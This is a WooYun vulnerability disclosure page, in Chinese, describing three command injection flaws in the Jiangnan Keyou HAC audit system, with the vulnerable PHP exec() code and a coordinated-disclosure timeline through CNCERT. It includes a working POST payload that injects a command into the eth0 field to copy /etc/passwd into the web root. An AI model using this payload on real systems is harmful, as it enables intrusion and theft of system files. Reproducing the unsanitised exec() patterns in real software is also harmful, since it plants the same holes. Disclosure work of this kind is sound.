当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-052834

漏洞标题:江南科友HAC运维审计系统存在三处命令注入漏洞(一处自带回显)

相关厂商:cncert国家互联网应急中心

漏洞作者: wefgod

提交时间:2014-03-05 12:50

修复时间:2014-06-03 12:51

公开时间:2014-06-03 12:51

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-03-05: 细节已通知厂商并且等待厂商处理中
2014-03-10: 厂商已经确认,细节仅向厂商公开
2014-03-13: 细节向第三方安全合作伙伴开放
2014-05-04: 细节向核心白帽子及相关领域专家公开
2014-05-14: 细节向普通白帽子公开
2014-05-24: 细节向实习白帽子公开
2014-06-03: 细节向公众公开

简要描述:

三处可执行漏洞的地方。版本和上次的版本是一样的
上一发:http://www.wooyun.org/bugs/wooyun-2014-051345

详细说明:

这次也还是在内网测试的。
第一处来一个执行可回显的(写shell请自行研究):
system\sys_ping.php

if(!empty($_POST['IP_addr']))
{
$cmd = "ping -c 4 -s 32 ".$_POST['IP_addr']; //问题参数IP_addr
exec($cmd, $list);
flush();
for($i=0;$i < count($list);$i++)
{
$row[$i]['list_msg'] = $list[$i];
}
$st->assign('pingip_value',$_POST['IP_addr']);
$st->assign('msg',$row);
}
$st->assign('nav_title', '系统管理>>网络配置>>Ping功能');
$st->assign('h1','sys_ping');
$st->output();


image006.png


image008.png


漏洞证明:

第二处:

system\tcpdump.php
if(!empty($_POST['eth0']))
{
$filename0="/tmp/".$_POST['eth0']."_".$data['0'].".tcp"; //eth0,其实下面还有其它参数的,雷同
//echo $filename0;
exec(MYSUDO."/usr/sbin/tcpdump -i eth0 -c $package -w $filename0 > /tmp/null &");
}


Post:
https://1.1.1.1/system/tcpdump.php
op_type=downloadcatch&eth0=1 | cp /etc/passwd /usr/local/apache2/htdocs/project/www/upload/123.txt | 1&dump=

image001.png


image003.png


image004.png


最后这里不具体测试了。给出代码例子
system\sys_basic.php

function CliIP($URL,$stat,$ipstr)
{
exec(MYSUDO."chown -R daemon:daemon".$URL);
if(file_exists($URL)){
exec(MYSUDO."sh ".$URL." ".$stat." ".$ipstr,$output,$er);
return $output[count($output)-1];
}
}
//MAC地址绑定
if(!empty($_POST['flag']) && $_GET['show_flag'] > 0)
{
switch($_POST['flag']) {
case '1':
$AA=CliIP('/usr/local/keyou/Bin/bindmac.sh','add',$_POST['IP']." ".$_POST['MAC']); //调用的这有问题。
if($AA)
$bindmac_flag = $AA;
else
$bindmac_flag = -1;
break;
case '2':
//echo $_POST['MACstr'];
$AA=CliIP('/usr/local/keyou/Bin/bindmac.sh','del',$_POST['MACstr']);
if($AA)
$bindmac_flag = $AA;
else
$bindmac_flag = -2;
break;
}
}

修复方案:

版权声明:转载请注明来源 wefgod@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-03-10 21:05

厂商回复:

CNVD确认所述漏洞机理,未在实例上进行复现,已经由CNVD通过直接联系渠道转报给江南科友公司,由其后续处置。

最新状态:

暂无